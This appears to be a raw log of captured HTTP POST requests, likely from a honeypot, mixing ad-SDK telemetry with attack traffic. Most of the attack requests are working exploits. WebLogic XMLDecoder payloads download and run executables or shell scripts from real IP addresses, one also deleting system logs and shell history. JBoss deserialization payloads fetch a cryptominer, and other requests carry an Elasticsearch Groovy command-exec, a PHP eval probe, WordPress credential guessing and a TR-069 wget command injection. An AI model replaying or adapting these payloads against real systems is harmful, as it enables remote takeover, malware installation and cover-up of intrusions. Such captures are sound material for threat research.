RaVXk9/LYbd4CXoOW9rSkqDXc49Y+P9CkyHuCKc4AbiXZ7wdopnYkKdVeakPj5zkK/uRPziQJKjOTlYTIO8DEnC+IIBmh5Vhf8ZVYO3Hhf6ahN2Gr34JI8Ago/vtwa9ovZ5c9BHf45v0ocMXp2B8/RSGV+HZGSZ3/jJWq/2hZMH39sJ5dLp+q42Sp9Qlh9Vn8B7d0mYThfMwTD3YQpBlVZGO5kQsQEz++5/AkmM4U54SwyJdjW/jxL/TBi8IqaB1emI9Mcer4yd/yqdFHMHjRizMulGbkPNM1f/S2qAm0iRJDEySUgORLswqHSxi4XG92ivK9OrCdtMIvEOMn8Mfp8m6vFP4+PJ9KpR9Ioy8TMfrCnRNIB1bTtgQGeM9cPU2Z3rQBsZEG/kgQLJmpWttjVvmS38ovHtGaj2TmScNv6m6

POST http://t5.proxy-checks.com/favicon.ico HTTP/1.1
Host: t5.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache



POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 2471
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>cmd.exe /c &quot;echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://198.50.179.109:8020/taskhostxz.exe&quot;,false&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.send()&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo If objXMLHTTP.Status=200 Then&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Open&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Type=1 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Write objXMLHTTP.ResponseBody&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Position=0 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.SaveToFile &quot;C:/Windows/temp/taskhostxz.exe&quot;&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Close&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo End if&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objXMLHTTP=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objShell.Exec(&quot;C:/Windows/temp/taskhostxz.exe&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;cscript.exe C:/Windows/temp/getpocc.vbs&quot;</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

POST /sdk HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Host: x.x.x.x:8080
Content-Length: 441
Connection: close

<soap:Envelope xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Header><operationID>00000001-00000001</operationID></soap:Header><soap:Body><RetrieveServiceContent xmlns="urn:internalvim25"><_this xsi:type="ManagedObjectReference" type="ServiceInstance">ServiceInstance</_this></RetrieveServiceContent></soap:Body></soap:Envelope>

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 26
Cache-Control: no-cache

log=jamesatchue&pwd=123!@#

POST http://check.proxyradar.com/azenv.php?auth=147369633295&a=PSCMN&i=2733905975&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
∂0B÷Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞î?1Y›∆√«∆fl

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1673
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>unset; rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; unset HISTFILE; unset HISTSAVE; unset HISTLOG; history -n; unset WATCH; export HISTFILE=/dev/null; export HISTFILE=/dev/null; wget http://93.174.93.149/logo8.sh -O /tmp/logo8.sh; curl -o /tmp/logo8.sh http://93.174.93.149/logo8.sh; lwp-download http://93.174.93.149/logo8.sh /tmp/logo8.sh; bash /tmp/logo8.sh; rm -rf /tmp/logo8.sh; history -c</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /invoker/readonly HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 1625
Host: x.x.x.x:80
User-Agent: Python-urllib/1.17

¨Ìsr2sun.reflect.annotation.AnnotationInvocationHandlerU ıÀ~•LmemberValuestLjava/util/Map;LtypetLjava/lang/Class;xps}

java.util.Mapxrjava.lang.reflect.Proxy·'⁄ ÃCÀ
L
ht%Ljava/lang/reflect/InvocationHandler;xpsq~sr*org.apache.commons.collections.map.LazyMapnÂîÇûyî
Lfactoryt,Lorg/apache/commons/collections/Transformer;xpsr:org.apache.commons.collections.functors.ChainedTransformer0«óÏ(zó
[
iTransformerst-[Lorg/apache/commons/collections/Transformer;xpur-[Lorg.apache.commons.collections.Transformer;ΩV*Òÿ4ôxpsr;org.apache.commons.collections.functors.ConstantTransformerXvêA±î
L	iConstanttLjava/lang/Object;xpvrjava.lang.Runtimexpsr:org.apache.commons.collections.functors.InvokerTransformeráˡk{|Œ8[iArgst[Ljava/lang/Object;LiMethodNametLjava/lang/String;[iParamTypest[Ljava/lang/Class;xpur[Ljava.lang.Object;êŒXüs)lxpt
getRuntimeur[Ljava.lang.Class;´◊ÆÀÕZôxpt	getMethoduq~vrjava.lang.String†§8z;≥Bxpvq~sq~uq~puq~tinvokeuq~vrjava.lang.Objectxpvq~sq~uq~
ur[Ljava.lang.String;≠“VÁÈ{Gxpt	/bin/basht-ct
python -c "import base64;exec(base64.b64decode('aW1wb3J0IGJhc2U2NCx1cmxsaWIKZm9yIGkgaW4gcmFuZ2UoNSk6CiAgICB0cnk6CiAgICAgICAgZXhlYyhiYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi51cmxvcGVuKCdodHRwOi8vay56c3c4LmNjL0FwaS8nKS5yZWFkKCkpKQogICAgICAgIGJyZWFrCiAgICBleGNlcHQ6CiAgICAgICAgcGFzcw=='))"texecuq~
vq~/srjava.util.HashMap⁄¡√`—F
loadFactorI	thresholdxp?@wxxvrjava.lang.annotation.Retentionxpq~:

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1673
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>unset; rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; unset HISTFILE; unset HISTSAVE; unset HISTLOG; history -n; unset WATCH; export HISTFILE=/dev/null; export HISTFILE=/dev/null; wget http://93.174.93.149/logo8.sh -O /tmp/logo8.sh; curl -o /tmp/logo8.sh http://93.174.93.149/logo8.sh; lwp-download http://93.174.93.149/logo8.sh /tmp/logo8.sh; bash /tmp/logo8.sh; rm -rf /tmp/logo8.sh; history -c</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

POST http://profile.adkmob.com/ud/ HTTP/1.1
Content-Length: 230
Content-Type: text/plain; charset=ISO-8859-1
Host: profile.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36

v=16&ac=50&pos=34100&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":0,"pkg":"com.screensaver.ad","des":"","sug":-1}]

POST http://d.applovin.com/device?device_token=MaznYs97JTiqaqEwnZGZ5hoNAbGKHRajj5FMcZF_ODHYTEi_kuVCQ4yNWoT9kVKCYOdmiOu8EBuDlBzDf9dDAcksZAxPMlyVV-CvlM0u7mEUGLyh8g8trSy-C2iSYtXpQsCRhRgeTqA7eY2q-c8xqFHgtRJiJ0jgDFMg8-H0uSU= HTTP/1.1
Content-Type: application/json; charset=utf-8
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: d.applovin.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 970

{"app_info":{"package_name":"com.virgil.basketball","ic":true,"installed_at":1494391549000,"app_version":"3.6","first_install":"false","applovin_sdk_version":"6.3.2","app_name":"Basketball Mania"},"device_info":{"os":"4.4.4","model":"MI 4LTE","tz_offset":7,"locale":"in_ID","sdk_version":19,"dnt":false,"type":"android","country_code":"ID","revision":"cancro","carrier":"TELKOMSEL","brand":"Xiaomi","orientation_lock":"portrait","idfa":"8776479c-11a4-48e7-8a70-96e640a29187","wvvc":0},"stats":{"ad_req":190,"SubmitData_time":505331,"FetchNextAd_time":2935170,"RepeatSubmitData_time":380819,"RenderAd_time":1611115,"TaskDispatchPostback_time":380919,"ad_session_start":1496230017843,"FetchNextAd_count":188,"RepeatFetchNextAd_time":646724,"cached_files_expired":66,"RepeatFetchNextAd_count":25,"RepeatSubmitData_count":21,"TaskDispatchPostback_count":40,"TaskCollectAdvertisingId_time":21556,"RenderAd_count":73,"SubmitData_count":36,"TaskCollectAdvertisingId_count":40}}

POST /w.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

leng=die('Hello, Peppa!'.(string)(111111111*9));

POST http://api.vungle.com/api/v4/requestAd HTTP/1.1
User-Agent: VungleDroid/3.3.4
X-VUNGLE-BUNDLE-ID: com.gamerun.subway.subwayrush
X-VUNGLE-TIMEZONE: Asia/Jakarta
Content-Type: application/json
X-VUNGLE-LANGUAGE: ind
Host: api.vungle.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 325

{"demo":{},"pubAppId":"5811c733a1e0773e1a000028","deviceInfo":{"dim":{"width":1080,"height":1920},"platform":"android","model":"Xiaomi,MI 4LTE","connection":"mobile","osVersion":"4.4.4","networkOperator":"TELKOMSEL","volume":0.26666668,"soundEnabled":false,"isSdCardAvailable":1},"ifa":"8776479c-11a4-48e7-8a70-96e640a29187"}

POST http://api.vungle.com/api/v4/sessionStart HTTP/1.1
User-Agent: VungleDroid/3.3.4
X-VUNGLE-BUNDLE-ID: com.gamerun.subway.subwayrush
X-VUNGLE-TIMEZONE: Asia/Jakarta
Content-Type: application/json
X-VUNGLE-LANGUAGE: ind
Host: api.vungle.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 106

{"start":1495362169077,"pubAppId":"5811c733a1e0773e1a000028","ifa":"8776479c-11a4-48e7-8a70-96e640a29187"}

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
∂ØmÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îäY›∆√«∆fl

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: text/xml
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Upgrade-Insecure-Requests: 1
Content-Length: 848
Host: x.x.x.x:7001

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
     <soapenv:Header>
     <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
     <java version="1.8.0_131" class="java.beans.XMLDecoder">
     <void class="java.lang.ProcessBuilder">
     <array class="java.lang.String" length="3">
     <void index="0">
     <string>cmd</string>
     </void>
     <void index="1">
     <string>/c</string>
     </void>
     <void index="2">
     <string>powershell (new-object System.Net.WebClient).DownloadFile('http://a46.bulehero.in/downloader.exe','C:/Windows/temp/wlanexts.exe');start C:/Windows/temp/wlanexts.exe</string>
     </void>
     </array>
     <void method="start"/></void>
     </java>
     </work:WorkContext>
     </soapenv:Header>
     <soapenv:Body/>
    </soapenv:Envelope>

POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 18
Cache-Control: no-cache

log=172&pwd=111111

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
`äQ<Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îêô1Y›∆√«∆fl

POST http://check.proxyradar.com/azenv.php?auth=149613607773&a=PSCMN&i=2335900298&p=8080 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST http://cm.adkmob.com/getCatalog/?android_id=6ccc52a8048214f&cver=51424845&mcc=510&model=MI+4LTE&brand=Xiaomi&os_version=19&lan=in&country=id&ch=2010002546&resolution=1920x1080&net=2&k=1 HTTP/1.1
Content-Length: 768
Host: cm.adkmob.com
Connection: Keep-Alive

Äë,_—úãd®3OÎ¥î(µ·K'7KÎô»á5ɶ¯i∏m[9ÃU`fl˛8≈™‡º∏Â~*øoM-∂ñÑ‘!+é˜S~¡≤«,[=>YŸ@Ï£@Aàvle
íé`[ùPqÃD¢≤Á»◊	<4ObWò(ɛ嗶P\˜í‚"&Óœ{xõgB<|È-ÑRœÕ√Œ≤≈µãÒ“?˚MÎ÷¯™bØÆÛìaƒUÖaÚå#yÉs£øŒEÔé^ıÓ¥!z≥
€ø:öµ®ø˙7á0.‰O∑M∆á
E≤vÖ¿ëÖÈ£Oå˙≤hâc\"ç©≥‚MEùÁê:,cÕ≠|k&1&üÏΩdH{[3⁄q*aøœ``µd
€s’
EÈçñ˙f∂G˝≈?…4‹OHïáÕÓrÀπÿ‹sÀûb˘è3‘ƒ{ÑñkS’ËÄ»>ß’09ÿ}•=Û∫£j
]úhÁ¨§ VΩfl≥ö«”€ñ∑gVF¡+˚+Ç˙c6≥u∏h˘%⁄“ZX˝≈/_⁄Â’°êB∑7@R1Û†/∂Â/_€—(æ∆˙Rˇb‹@ƒpDÆ~x†<fl˛í\™´Ds’2$ıÂ~; •í»_Ë˝=èSƒú≥>“!∞<®åÄ)–Q:x—0œ&Ç»OOñ“CÒ»-jуDÊ√|ˇÿ3hfl:ø;G¨Ÿ5l¿vºqˆÙáå◊O˘iæ—¥z@Ó–›z•o ù”ÚX?Æ(ú•´¡{=ıaè°‚‚π$˙ìâ¬ñO$ô¿»ˇ˛Æfl{íÓòF}ûÑ8¶˘z>WË∫í´r∆aßqÇL6Ôı≈ÓÙ-∏çEg√ë»4&Û…∂∏∆!u»k?‰Ï∑•øa4⁄<•Hdh`'™]Ñ˚s4«Ó¶Úìù≥â%uÒp‚¢k∑Á¶/Z[~U2§ Œ,'–PWoyÂÄ›0ú¥N◊Hc:Í6ø©éÊÀ*πœO\9‚•ôkj!âPÚÍB«è GÕGœìL€ñ

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Host: x.x.x.x
Content-Length: 404
Cache-Control: no-cache

CFy3yXAVVgfWgC91sm3Ead8gQzm9HcT7SGkbBjcTvb0FtnX83jHVyyON6e5Hf1QXle4AJkzn2de5RN41N5witEU4XgK9P4BhiLydgOlSeoZZ0OOerdX9zqzQ0ntHUE/XhZzXTmwuo7MUxAbmH3FO/CIOQh6lFJgTqqrDTe4p71ey3tEG4DBIAo9GSmk4rAmOOo1fVsUdSydxCch7WYkkXaw8jF9KUXZYvAljksg+2Uc84PisTFkrkZTC1A3p1w9hxa20XQwXVY01WN9XkWZU67lobcTmR9oSj1RCY9FYgHKEianp97c985HgZEHSI8oPyO6AashgrgM9GK2znXvi6V5IUI0XnRz6saCYMwRlRr1PXKnnwgIbZLBzDBRn90MgO59oz3esKH0h2MUounU=

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded;charset=utf-8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36
Host: x.x.x.x
Content-Length: 0
Connection: Keep-Alive



POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
ÖÖ§ŒÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îp2Y›∆√«∆fl

POST /invoker/readonly HTTP/1.1
Host: x.x.x.x
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.18.4
Content-Length: 1564

¨Ìsr2sun.reflect.annotation.AnnotationInvocationHandlerU ıÀ~•LmemberValuestLjava/util/Map;LtypetLjava/lang/Class;xps}

java.util.Mapxrjava.lang.reflect.Proxy·'⁄ ÃCÀ
L
ht%Ljava/lang/reflect/InvocationHandler;xpsq~sr*org.apache.commons.collections.map.LazyMapnÂîÇûyî
Lfactoryt,Lorg/apache/commons/collections/Transformer;xpsr:org.apache.commons.collections.functors.ChainedTransformer0«óÏ(zó
[
iTransformerst-[Lorg/apache/commons/collections/Transformer;xpur-[Lorg.apache.commons.collections.Transformer;ΩV*Òÿ4ôxpsr;org.apache.commons.collections.functors.ConstantTransformerXvêA±î
L	iConstanttLjava/lang/Object;xpvrjava.lang.Runtimexpsr:org.apache.commons.collections.functors.InvokerTransformeráˡk{|Œ8[iArgst[Ljava/lang/Object;LiMethodNametLjava/lang/String;[iParamTypest[Ljava/lang/Class;xpur[Ljava.lang.Object;êŒXüs)lxpt
getRuntimeur[Ljava.lang.Class;´◊ÆÀÕZôxpt	getMethoduq~vrjava.lang.String†§8z;≥Bxpvq~sq~uq~puq~tinvokeuq~vrjava.lang.Objectxpvq~sq~ur[Ljava.lang.String;≠“VÁÈ{Gxp
tΩpowershell.exe -WindowStyle Hidden $P = nEW-oBJECT sYSTEM.nET.wEBcLIENT;$P.DownloadFile('http://222.184.79.11:5317/minerxmr.exe', 'C:\\minerxmr.exe');START C:\\minerxmr.exetexecuq~
q~#sq~srjava.lang.Integer‚†§˜Åá8
Ivaluexrjava.lang.Numberܨïî‡ãxp
srjava.util.HashMap⁄¡√`—F
loadFactorI	thresholdxp?@wxxvrjava.lang.Overridexpq~:

POST /db_session.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

eval=die('Hello, Peppa!'.(string)(111111111*9));

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 21
Cache-Control: no-cache

log=admin&pwd=7654321

POST /wls-wsat/ParticipantPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 2471
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> 
   <soapenv:Header>        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> 
           <java version="1.8.0_151" class="java.beans.XMLDecoder"> 
               <void class="java.lang.ProcessBuilder"> 
                  <array class="java.lang.String" length="3">                      <void index = "0">                                                 <string>cmd</string>                                       </void>                                                          <void index = "1">                                                 <string>/c</string>                                        </void>                                                          <void index = "2">                       <string>cmd.exe /c &quot;echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://198.50.179.109:8020/taskhostxz.exe&quot;,false&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.send()&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo If objXMLHTTP.Status=200 Then&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Open&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Type=1 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Write objXMLHTTP.ResponseBody&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Position=0 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.SaveToFile &quot;C:/Windows/temp/taskhostxz.exe&quot;&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Close&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo End if&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objXMLHTTP=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objShell.Exec(&quot;C:/Windows/temp/taskhostxz.exe&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;cscript.exe C:/Windows/temp/getpocc.vbs&quot;</string>                      </void>                                                      </array>                  <void method="start"/>                  </void>            </java>        </work:WorkContext>   </soapenv:Header>   <soapenv:Body/></soapenv:Envelope>

POST http://tech.lovelyskin.ru/proxyc/engine.php HTTP/1.0
Accept: */*
Referer: http://tech.lovelyskin.ru/proxyc/engine.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Host: tech.lovelyskin.ru
Content-Type: application/x-www-form-urlencoded
Content-length: 13
Pragma: no-cache

xrumer=inside

POST /UD/act?1 HTTP/1.1
Host: x.x.x.x:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 526

<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body>  <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">   <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2`</NewNTPServer1>   <NewNTPServer2></NewNTPServer2>   <NewNTPServer3></NewNTPServer3>   <NewNTPServer4></NewNTPServer4>   <NewNTPServer5></NewNTPServer5>  </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>


POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
